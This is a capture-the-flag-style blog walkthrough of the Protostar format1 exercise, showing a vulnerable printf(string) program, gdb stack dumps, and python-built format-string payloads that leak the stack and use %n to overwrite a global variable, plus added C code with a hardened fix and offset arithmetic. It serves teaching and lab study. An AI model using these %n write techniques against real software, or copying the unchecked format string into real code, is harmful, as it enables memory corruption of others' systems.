0x0D – Modify variable using format string

How a format string leaks memory was covered in the previous post, Introduction to format string. So what can we actually do with a format string? We'll work through it the same way we did with the BoF.

C code from protostar

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;                 /* global in .bss; the goal is to make it non-zero */

void vuln(char *string)
{
  printf(string);           /* user input used directly as the format string */
  
  if(target) {
      printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);            /* argv[1] is the attacker-controlled string */
}

The weakness here is obvious at a glance: the format string. But the task this time is to modify the global variable target.
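Before following the exploit, here is what the fix looks like. This is an added example, not Protostar's code: the page's vuln() is rewritten so the format is a constant and argv[1] is passed as a %s argument, plus a small audit helper (my own, hypothetical name count_directives) that counts how many conversions a string would trigger if it were wrongly used as a format. On gcc and clang, -Wformat -Wformat-security flags the original printf(string) at compile time.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the Protostar sources.  The page's vuln() calls
   printf(string); the hardened form below never lets input become a format. */

int target;   /* same global the Protostar binary checks; stays 0 here */

/* Hardened vuln(): constant format, user data goes through %s (or fputs). */
void vuln_fixed(const char *string)
{
    printf("%s", string);
    if (target)
        printf("you have modified the target :)\n");
}

/* Same fix applied to a buffer so the result can be inspected in a test:
   copies the user string through a constant format and returns the number
   of characters snprintf would have written. */
int format_as_data(const char *user, char *out, size_t outsz)
{
    return snprintf(out, outsz, "%s", user);
}

/* Audit helper: count the conversion directives a string would trigger if
   it were used as a format.  "%%" is a literal percent sign, not a directive. */
int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(int argc, char **argv)
{
    char out[256];
    const char *input = argc > 1 ? argv[1] : "AAAA%x";   /* constructed default */

    printf("directives in input: %d\n", count_directives(input));
    format_as_data(input, out, sizeof out);
    printf("echoed as data: %s\n", out);
    vuln_fixed(input);
    printf("\ntarget is still %d\n", target);
    return 0;
}
```

Run it with "AAAA%x" as the argument and the %x is printed back literally instead of being interpreted; count_directives reports 1, which is the kind of check a logging or fuzzing harness can apply to any string that is about to reach a printf-family function.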

First, let's check whether the format string vuln is there.

$ ./format1 "AAAA%x"
AAAA804960c

A memory address came out, so the vuln is there. Let's debug it.

(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x0804841c <main+0>:    push   ebp
0x0804841d <main+1>:    mov    ebp,esp
0x0804841f <main+3>:    and    esp,0xfffffff0
0x08048422 <main+6>:    sub    esp,0x10
0x08048425 <main+9>:    mov    eax,DWORD PTR [ebp+0xc]
0x08048428 <main+12>:   add    eax,0x4
0x0804842b <main+15>:   mov    eax,DWORD PTR [eax]
0x0804842d <main+17>:   mov    DWORD PTR [esp],eax
0x08048430 <main+20>:   call   0x80483f4 <vuln>
0x08048435 <main+25>:   leave
0x08048436 <main+26>:   ret
End of assembler dump.

The main function does nothing but call vuln. In vuln, let's set two breakpoints as usual.

(gdb) disas vuln
Dump of assembler code for function vuln:
0x080483f4 <vuln+0>:    push   ebp
0x080483f5 <vuln+1>:    mov    ebp,esp
0x080483f7 <vuln+3>:    sub    esp,0x18
0x080483fa <vuln+6>:    mov    eax,DWORD PTR [ebp+0x8]
0x080483fd <vuln+9>:    mov    DWORD PTR [esp],eax
0x08048400 <vuln+12>:   call   0x8048320 <printf@plt>
0x08048405 <vuln+17>:   mov    eax,ds:0x8049638
0x0804840a <vuln+22>:   test   eax,eax
0x0804840c <vuln+24>:   je     0x804841a <vuln+38>
0x0804840e <vuln+26>:   mov    DWORD PTR [esp],0x8048500
0x08048415 <vuln+33>:   call   0x8048330 <puts@plt>
0x0804841a <vuln+38>:   leave
0x0804841b <vuln+39>:   ret
End of assembler dump.
(gdb) break *vuln+12
Breakpoint 1 at 0x8048400: file format1/format1.c, line 10.
(gdb) break *vuln+39
Breakpoint 2 at 0x804841b: file format1/format1.c, line 15.

OK, let's run it.

(gdb) r "AAAA%x"
Starting program: /opt/protostar/bin/format1 "AAAA%x"
0xbffffc80:     0xbffffe8e      0x0804960c      0xbffffcb8      0x08048469
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0xbffffcb8      0x08048435
0xbffffca0:     0xbffffe8e      0xb7ff1040      0x0804845b      0xb7fd7ff4
0xbffffcb0:     0x08048450      0x00000000      0xbffffd38      0xb7eadc76
0xbffffcc0:     0x00000002      0xbffffd64      0xbffffd70      0xb7fe1848
0xbffffcd0:     0xbffffd20      0xffffffff      0xb7ffeff4      0x0804824d
0xbffffce0:     0x00000001      0xbffffd20      0xb7ff0626      0xb7fffab0
0xbffffcf0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0x8048400 <vuln+12>:    call   0x8048320 <printf@plt>
0x8048405 <vuln+17>:    mov    eax,ds:0x8049638

Breakpoint 1, 0x08048400 in vuln (string=0xbffffe8e "AAAA%x")
    at format1/format1.c:10
10      format1/format1.c: No such file or directory.
        in format1/format1.c

As in the previous post, what leaks are the values from the second argument onward on the stack. One thing to notice here: the AAAAs are not easily found on the stack.

Let's dump up to 100.

$ ./format1 "`python -c 'print "AAAA"+"%08x."*100'`"
AAAA0804960c.bffffb08.08048469.b7fd8304.b7fd7ff4.bffffb08.08048435.bffffcc1.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffffb88.b7eadc76.00000002.bffffbb4.bffffbc0.b7fe1848.bffffb70.ffffffff.b7ffeff4.0804824d.00000001.bffffb70.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb88.b4ff8aa3.9eb1dcb3.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffffbb4.08048450.08048440.b7ff1040.bffffbac.b7fff8f8.00000002.bffffcb7.bffffcc1.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.

Still not found there. Let's dump 200, then.

$ ./format1 "`python -c 'print "AAAA"+"%08x."*200'`"
AAAA0804960c.bffff918.08048469.b7fd8304.b7fd7ff4.bffff918.08048435.bffffacd.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffff998.b7eadc76.00000002.bffff9c4.bffff9d0.b7fe1848.bffff980.ffffffff.b7ffeff4.0804824d.00000001.bffff980.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffff998.a80d15fd.824723ed.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffff9c4.08048450.08048440.b7ff1040.bffff9bc.b7fff8f8.00000002.bffffac3.bffffacd.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffaab.0000001f.bffffff2.0000000f.bffffabb.00000000.00000000.02000000.aab55996.5d412bff.ca4b3599.69c0f316.00363836.2e000000.726f662f.3174616d.41414100.38302541.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.

Found it. So now we have to write. In a format string, %x can only leak memory, but %n can write to an address. First, though, we have to find the target variable: only when we know its address can we modify it.

$ objdump -t format1

format1:     file format elf32-i386

SYMBOL TABLE:
08048114 l    d  .interp        00000000              .interp
08048128 l    d  .note.ABI-tag  00000000              .note.ABI-tag
08048148 l    d  .note.gnu.build-id     00000000              .note.gnu.build-id
0804816c l    d  .hash  00000000              .hash
08048198 l    d  .gnu.hash      00000000              .gnu.hash
080481b8 l    d  .dynsym        00000000              .dynsym
08048218 l    d  .dynstr        00000000              .dynstr
0804826a l    d  .gnu.version   00000000              .gnu.version
08048278 l    d  .gnu.version_r 00000000              .gnu.version_r
08048298 l    d  .rel.dyn       00000000              .rel.dyn
080482a0 l    d  .rel.plt       00000000              .rel.plt
080482c0 l    d  .init  00000000              .init
080482f0 l    d  .plt   00000000              .plt
08048340 l    d  .text  00000000              .text
080484dc l    d  .fini  00000000              .fini
080484f8 l    d  .rodata        00000000              .rodata
08048520 l    d  .eh_frame      00000000              .eh_frame
08049524 l    d  .ctors 00000000              .ctors
0804952c l    d  .dtors 00000000              .dtors
08049534 l    d  .jcr   00000000              .jcr
08049538 l    d  .dynamic       00000000              .dynamic
08049608 l    d  .got   00000000              .got
0804960c l    d  .got.plt       00000000              .got.plt
08049628 l    d  .data  00000000              .data
08049630 l    d  .bss   00000000              .bss
00000000 l    d  .stab  00000000              .stab
00000000 l    d  .stabstr       00000000              .stabstr
00000000 l    d  .comment       00000000              .comment
00000000 l    df *ABS*  00000000              crtstuff.c
08049524 l     O .ctors 00000000              __CTOR_LIST__
0804952c l     O .dtors 00000000              __DTOR_LIST__
08049534 l     O .jcr   00000000              __JCR_LIST__
08048370 l     F .text  00000000              __do_global_dtors_aux
08049630 l     O .bss   00000001              completed.5982
08049634 l     O .bss   00000004              dtor_idx.5984
080483d0 l     F .text  00000000              frame_dummy
00000000 l    df *ABS*  00000000              crtstuff.c
08049528 l     O .ctors 00000000              __CTOR_END__
08048520 l     O .eh_frame      00000000              __FRAME_END__
08049534 l     O .jcr   00000000              __JCR_END__
080484b0 l     F .text  00000000              __do_global_ctors_aux
00000000 l    df *ABS*  00000000              format1.c
0804960c l     O .got.plt       00000000              .hidden _GLOBAL_OFFSET_TABLE_
08049524 l       .ctors 00000000              .hidden __init_array_end
08049524 l       .ctors 00000000              .hidden __init_array_start
08049538 l     O .dynamic       00000000              .hidden _DYNAMIC
08049628  w      .data  00000000              data_start
08048440 g     F .text  00000005              __libc_csu_fini
08048340 g     F .text  00000000              _start
00000000  w      *UND*  00000000              __gmon_start__
00000000  w      *UND*  00000000              _Jv_RegisterClasses
080484f8 g     O .rodata        00000004              _fp_hw
080484dc g     F .fini  00000000              _fini
00000000       F *UND*  00000000              __libc_start_main@@GLIBC_2.0
080484fc g     O .rodata        00000004              _IO_stdin_used
08049628 g       .data  00000000              __data_start
0804962c g     O .data  00000000              .hidden __dso_handle
08049530 g     O .dtors 00000000              .hidden __DTOR_END__
08048450 g     F .text  0000005a              __libc_csu_init
00000000       F *UND*  00000000              printf@@GLIBC_2.0
08049630 g       *ABS*  00000000              __bss_start
080483f4 g     F .text  00000028              vuln
08049638 g     O .bss   00000004              target
0804963c g       *ABS*  00000000              _end
00000000       F *UND*  00000000              puts@@GLIBC_2.0
08049630 g       *ABS*  00000000              _edata
080484aa g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
0804841c g     F .text  0000001b              main
080482c0 g     F .init  00000000              _init

You can see the global variable target is stored in the .bss section.

08049638 g O .bss 00000004 target

08049638 is the address of target. So how do we proceed from here?

When we write, our address has to land exactly on a stack word. What that means, we'll see as we continue.

08049638 = \x38\x96\x04\x08

$ ./format1 "`python -c 'print "AAAAAAAA"+"\x38\x96\x04\x08"+"BBBB"+"%08x"*200'`"
AAAAAAAA8BBBB0804960cbffff9c808048469b7fd8304b7fd7ff4bffff9c808048435bffffb89b7ff10400804845bb7fd7ff40804845000000000bffffa48b7eadc7600000002bffffa74bffffa80b7fe1848bffffa30ffffffffb7ffeff40804824d00000001bffffa30b7ff0626b7fffab0b7fe1b28b7fd7ff40000000000000000bffffa48b819b36c9252657c000000000000000000000000000000020804834000000000b7ff6210b7eadb9bb7ffeff4000000020804834000000000080483610804841c00000002bffffa740804845008048440b7ff1040bffffa6cb7fff8f800000002bffffb7fbffffb8900000000bffffebabffffeddbffffee7bffffefbbfffff0dbfffff1dbfffff30bfffff3dbfffff48bfffff86bfffff97bfffffa5bfffffbc0000000000000020b7fe241400000021b7fe200000000010078bfbbf000000060000100000000011000000640000000308048034000000040000002000000005000000700000007b7fe3000000000080000000000000009080483400000000b000003e90000000c000000000000000d000003e90000000e000003e9000000170000000100000019bffffb5b0000001fbffffff20000000fbffffb6b00000000000000006b0000000972c177d809a3f56130a9a769bd26f2003638360000000000000000000000002e000000726f662f3174616d41414100414141410496384142424242083830254238302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578383025783830257838302578

There's a lot of extra output at the end, and it isn't lining up exactly. Let's go back to gdb.

(gdb) ni
0xbffffc80:     0xbffffe8e      0x0804960c      0xbffffcb8      0x08048469
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0xbffffcb8      0x08048435
0xbffffca0:     0xbffffe8e      0xb7ff1040      0x0804845b      0xb7fd7ff4
0xbffffcb0:     0x08048450      0x00000000      0xbffffd38      0xb7eadc76
0xbffffcc0:     0x00000002      0xbffffd64      0xbffffd70      0xb7fe1848
0xbffffcd0:     0xbffffd20      0xffffffff      0xb7ffeff4      0x0804824d
0xbffffce0:     0x00000001      0xbffffd20      0xb7ff0626      0xb7fffab0
0xbffffcf0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0x8048400 <vuln+12>:    call   0x8048320 <printf@plt>
0x8048405 <vuln+17>:    mov    eax,ds:0x8049638
0x08048400      10      in format1/format1.c

This is the state just before printf is called. If 0x0804960c is the first memory address that gets leaked,

then what is at 0xbffffe8e? It's the format string, isn't it? You can check the previous post.

(gdb) x/x 0xbffffe8e
0xbffffe8e:     0x41414141

Since it's quite far down, let's dump the stack up to 200 words.

(gdb) x/200wx $esp
0xbffffc80:     0xbffffe8e      0x0804960c      0xbffffcb8      0x08048469
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0xbffffcb8      0x08048435
0xbffffca0:     0xbffffe8e      0xb7ff1040      0x0804845b      0xb7fd7ff4
0xbffffcb0:     0x08048450      0x00000000      0xbffffd38      0xb7eadc76
0xbffffcc0:     0x00000002      0xbffffd64      0xbffffd70      0xb7fe1848
0xbffffcd0:     0xbffffd20      0xffffffff      0xb7ffeff4      0x0804824d
0xbffffce0:     0x00000001      0xbffffd20      0xb7ff0626      0xb7fffab0
0xbffffcf0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffd00:     0xbffffd38      0x6cd66236      0x46979426      0x00000000
0xbffffd10:     0x00000000      0x00000000      0x00000002      0x08048340
0xbffffd20:     0x00000000      0xb7ff6210      0xb7eadb9b      0xb7ffeff4
0xbffffd30:     0x00000002      0x08048340      0x00000000      0x08048361
0xbffffd40:     0x0804841c      0x00000002      0xbffffd64      0x08048450
0xbffffd50:     0x08048440      0xb7ff1040      0xbffffd5c      0xb7fff8f8
0xbffffd60:     0x00000002      0xbffffe73      0xbffffe8e      0x00000000
0xbffffd70:     0xbffffe95      0xbffffe9f      0xbffffec2      0xbffffed6
0xbffffd80:     0xbffffee6      0xbffffef8      0xbfffff0b      0xbfffff18
0xbffffd90:     0xbfffff23      0xbfffff2e      0xbfffff6c      0xbfffff7d
0xbffffda0:     0xbfffff8b      0xbfffffa2      0xbfffffd8      0x00000000
0xbffffdb0:     0x00000020      0xb7fe2414      0x00000021      0xb7fe2000
0xbffffdc0:     0x00000010      0x078bfbbf      0x00000006      0x00001000
0xbffffdd0:     0x00000011      0x00000064      0x00000003      0x08048034
0xbffffde0:     0x00000004      0x00000020      0x00000005      0x00000007
0xbffffdf0:     0x00000007      0xb7fe3000      0x00000008      0x00000000
0xbffffe00:     0x00000009      0x08048340      0x0000000b      0x000003e9
0xbffffe10:     0x0000000c      0x000003e9      0x0000000d      0x000003e9
0xbffffe20:     0x0000000e      0x000003e9      0x00000017      0x00000001
0xbffffe30:     0x00000019      0xbffffe5b      0x0000001f      0xbfffffe1
0xbffffe40:     0x0000000f      0xbffffe6b      0x00000000      0x00000000
0xbffffe50:     0x00000000      0x00000000      0x78000000      0xf19aee37
0xbffffe60:     0xe4a4c997      0x4e611f21      0x696fd209      0x00363836
0xbffffe70:     0x2f000000      0x2f74706f      0x746f7270      0x6174736f
0xbffffe80:     0x69622f72      0x6f662f6e      0x74616d72      0x41410031
0xbffffe90:     0x78254141      0x45535500      0x73753d52      0x53007265
0xbffffea0:     0x435f4853      0x4e45494c      0x39313d54      0x36312e32
0xbffffeb0:     0x33342e38      0x3433322e      0x39333520      0x32203636
0xbffffec0:     0x414d0032      0x2f3d4c49      0x2f726176      0x6c69616d
0xbffffed0:     0x6573752f      0x4f480072      0x2f3d454d      0x656d6f68
0xbffffee0:     0x6573752f      0x4c4f0072      0x44575044      0x6f682f3d
0xbffffef0:     0x752f656d      0x00726573      0x5f485353      0x3d595454
0xbfffff00:     0x7665642f      0x7374702f      0x4c00312f      0x414e474f
0xbfffff10:     0x753d454d      0x00726573      0x554c4f43      0x3d534e4d
0xbfffff20:     0x54003038      0x3d4d5245      0x72657478      0x4150006d
0xbfffff30:     0x2f3d4854      0x2f727375      0x61636f6c      0x69622f6c
0xbfffff40:     0x752f3a6e      0x622f7273      0x2f3a6e69      0x3a6e6962
0xbfffff50:     0x7273752f      0x636f6c2f      0x672f6c61      0x73656d61
0xbfffff60:     0x73752f3a      0x61672f72      0x0073656d      0x474e414c
0xbfffff70:     0x5f6e653d      0x552e5355      0x382d4654      0x45485300
0xbfffff80:     0x2f3d4c4c      0x2f6e6962      0x50006873      0x2f3d4457
0xbfffff90:     0x2f74706f      0x746f7270      0x6174736f      0x69622f72

How do we calculate the alignment for this?

Isn't the distance from the start of the stack to where the format string sits exact?

(gdb) x/d 0xbffffe8e-0xbffffc80
0x20e:  Cannot access memory at address 0x20e

How much is 0x20e?

>>> 0x20e
526

So, with a calculator, divide 526 by 4: that gives 131. Let's try it.

$ ./format1 "`python -c 'print "AAAA"+"\x38\x96\x04\x08"+"BBBB"+"%08x"*131'`"
AAAA8BBBB0804960cbffffae808048469b7fd8304b7fd7ff4bffffae808048435bffffca1b7ff10400804845bb7fd7ff40804845000000000bffffb68b7eadc7600000002bffffb94bffffba0b7fe1848bffffb50ffffffffb7ffeff40804824d00000001bffffb50b7ff0626b7fffab0b7fe1b28b7fd7ff40000000000000000bffffb68cc9dca9ee6d05c8e000000000000000000000000000000020804834000000000b7ff6210b7eadb9bb7ffeff4000000020804834000000000080483610804841c00000002bffffb940804845008048440b7ff1040bffffb8cb7fff8f800000002bffffc97bffffca100000000bffffebabffffeddbffffee7bffffefbbfffff0dbfffff1dbfffff30bfffff3dbfffff48bfffff86bfffff97bfffffa5bfffffbc0000000000000020b7fe241400000021b7fe200000000010078bfbbf0000000600001000000000110000006400000003080480340000000400000020000000050000000700000007b7fe3000000000080000000000000009080483400000000b000003e90000000c000000000000000d000003e90000000e000003e9000000170000000100000019bffffc7b0000001fbffffff20000000fbffffc8b00000000000000002c00000015256b6335f099b487212d496997423300363836000000002e000000726f662f3174616d4141410004963841424242083830254238302578383025783830257838302578

No :3 It all went wrong. That alignment took a lot of trial and error.
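Why 131 goes wrong is visible in the numbers already on the page. This is an added example, not part of the post: the distance arithmetic done with gdb and a calculator above, written out in C with the page's two addresses (esp 0xbffffc80 at the printf call and the argv[1] string at 0xbffffe8e). The names locate_format_string, slot_info and word_bytes are mine. 526 is not a multiple of 4, so the string starts 2 bytes into the 131st word; the gdb dump confirms it, since the word at 0xbffffe8c is 0x41410031, which in memory is "1\0AA". The offsets also differ between gdb (/opt/protostar/bin/format1) and the shell (./format1), because argv[0] and the environment sit above the stack and shift everything below them, which is why the post ends up at a different count outside gdb.

```c
#include <stdio.h>
#include <stdint.h>

/* Added example, not from the post: the stack-distance arithmetic behind
   "526 / 4 = 131", with the misalignment that the division by hand drops.
   Addresses are the ones from the page's gdb session (32-bit Protostar). */

#define WORD 4u   /* on x86-32 every %x consumes one 4-byte stack word */

struct slot_info {
    uint32_t distance;   /* bytes from esp to the start of the format string */
    uint32_t index;      /* the N-th %x prints the word the string starts in */
    uint32_t misalign;   /* how many bytes into that word the string starts  */
    uint32_t pad;        /* bytes needed in front before the next word boundary */
};

/* At the printf call [esp] holds the format pointer and [esp + 4*k] is the
   word the k-th %x reads, so a string at esp + d starts inside word d / 4. */
struct slot_info locate_format_string(uint32_t esp, uint32_t str)
{
    struct slot_info s;
    s.distance = str - esp;
    s.index    = s.distance / WORD;            /* 0x20e / 4 = 131 */
    s.misalign = s.distance % WORD;            /* 0x20e % 4 = 2   */
    s.pad      = (WORD - s.misalign) % WORD;   /* 2 bytes to reach word 132 */
    return s;
}

/* Split a word from an x/wx dump into the bytes as they lie in memory
   (little-endian), so the page's 0x41410031 reads as 31 00 41 41 = "1\0AA". */
void word_bytes(uint32_t w, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(w >> (8 * i));
}

int main(void)
{
    struct slot_info s = locate_format_string(0xbffffc80u, 0xbffffe8eu);
    printf("distance 0x%x = %u bytes -> word %u, %u byte(s) past the boundary\n",
           s.distance, s.distance, s.index, s.misalign);
    if (s.misalign)
        printf("a 4-byte value at the string start straddles words %u and %u;\n"
               "%u leading byte(s) would put it in word %u\n",
               s.index, s.index + 1, s.pad, s.index + 1);

    unsigned char b[4];
    word_bytes(0x41410031u, b);   /* the word at 0xbffffe8c in the dump above */
    printf("0x41410031 in memory: %02x %02x %02x %02x\n", b[0], b[1], b[2], b[3]);
    return 0;
}
```

The two numbers to carry away are index and misalign: with misalign 2, "%08x"*131 lands on a word that holds two bytes of argv[0]'s trailing "1\0" and only two of the As, which is exactly the "not lining up" seen in the runs above. The commenter's three-byte padding at the end of the page is the same correction for a different misalignment outside gdb.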

If you ask why I wrote down the things that didn't work, it's because I write as I try things. The method I was trying is from LiveOverflow's video. It didn't work for me. So I set the alignment aside and redid it from scratch. The attempts in between that didn't work I won't show here; there are a lot of them, since I tried many times 😀

In the end I went looking for it like this.

$ ./format1 "`python -c 'print "AAAA"+"%08x."*123+"%08x.%08x.%08x"'`"
AAAA0804960c.bffffa88.08048469.b7fd8304.b7fd7ff4.bffffa88.08048435.bffffc40.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffffb08.b7eadc76.00000002.bffffb34.bffffb40.b7fe1848.bffffaf0.ffffffff.b7ffeff4.0804824d.00000001.bffffaf0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb08.463cacbf.6c71faaf.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffffb34.08048450.08048440.b7ff1040.bffffb2c.b7fff8f8.00000002.bffffc36.bffffc40.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffc1b.0000001f.bffffff2.0000000f.bffffc2b.00000000.00000000.81000000.c6f8ff03.cce05ce4.f1a870a7.69f69568.00363836.00000000.2f2e0000.6d726f66.00317461.41414141.78383025.3830252e

You can see that the %08x right after the 123 lines up exactly with the As.

So let's try a write.

$ ./format1 "`python -c 'print "AAAA"+"%08x."*123+"%n.%08x.%08x"'`"
AAAA0804960c.bffffa88.08048469.b7fd8304.b7fd7ff4.bffffa88.08048435.bffffc42.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffffb08.b7eadc76.00000002.bffffb34.bffffb40.b7fe1848.bffffaf0.ffffffff.b7ffeff4.0804824d.00000001.bffffaf0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb08.06caacf2.2c87fae2.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffffb34.08048450.08048440.b7ff1040.bffffb2c.b7fff8f8.00000002.bffffc38.bffffc42.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffc1b.0000001f.bffffff2.0000000f.bffffc2b.00000000.00000000.b60Segmentation fault

We get a Segmentation fault error, so we can assume it's working. So let's put the address of the global variable target in place of the AAAAs.

$ ./format1 "`python -c 'print "\x38\x96\x04\x08"+"%08x."*123+"%08x.%08x.%08x"'`"
80804960c.bffffa88.08048469.b7fd8304.b7fd7ff4.bffffa88.08048435.bffffc40.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffffb08.b7eadc76.00000002.bffffb34.bffffb40.b7fe1848.bffffaf0.ffffffff.b7ffeff4.0804824d.00000001.bffffaf0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb08.ef8a700d.c5c7261d.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffffb34.08048450.08048440.b7ff1040.bffffb2c.b7fff8f8.00000002.bffffc36.bffffc40.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffc1b.0000001f.bffffff2.0000000f.bffffc2b.00000000.00000000.26000000.a8dc3df6.a5b9083f.9eb849d7.69759cdd.00363836.00000000.2f2e0000.6d726f66.00317461.08049638.78383025.3830252e$

Now everything lines up exactly 😀

So let's write at that spot.

./format1 "`python -c 'print "\x38\x96\x04\x08"+"%08x."*123+"%08n.%08x.%08x"'`"

Nice !

$ ./format1 "`python -c 'print "\x38\x96\x04\x08"+"%08x."*123+"%08n.%08x.%08x"'`"
80804960c.bffffa88.08048469.b7fd8304.b7fd7ff4.bffffa88.08048435.bffffc40.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffffb08.b7eadc76.00000002.bffffb34.bffffb40.b7fe1848.bffffaf0.ffffffff.b7ffeff4.0804824d.00000001.bffffaf0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb08.4cb15c2d.66fc0a3d.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffffb34.08048450.08048440.b7ff1040.bffffb2c.b7fff8f8.00000002.bffffc36.bffffc40.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffc1b.0000001f.bffffff2.0000000f.bffffc2b.00000000.00000000.d9000000.3e938fc2.3ba959a2.16220121.6975bd50.00363836.00000000.2f2e0000.6d726f66.00317461..78383025.3830252eyou have modified the target :)

POC

Thanks


3 Comments

  1. Here's how I did it 😀
    https://s9.postimg.org/vltrt5kan/Screenshot_from_2018-04-08_21-53-21.png

    The three Cs at the end I added as padding; then I took AAAA's exact offset and did the write 😀
    Thanks For Sharing Bro

    • Great bro 😉 Let me ask you one thing 😀 Have you studied Linux binary exploitation
      before? I'm not sure.

      • I've studied it a little, here and there. Hehe

1 Trackback / Pingback

  1. 0x0E – Global Offset Table Overwrite using Format String – Legion of LOL
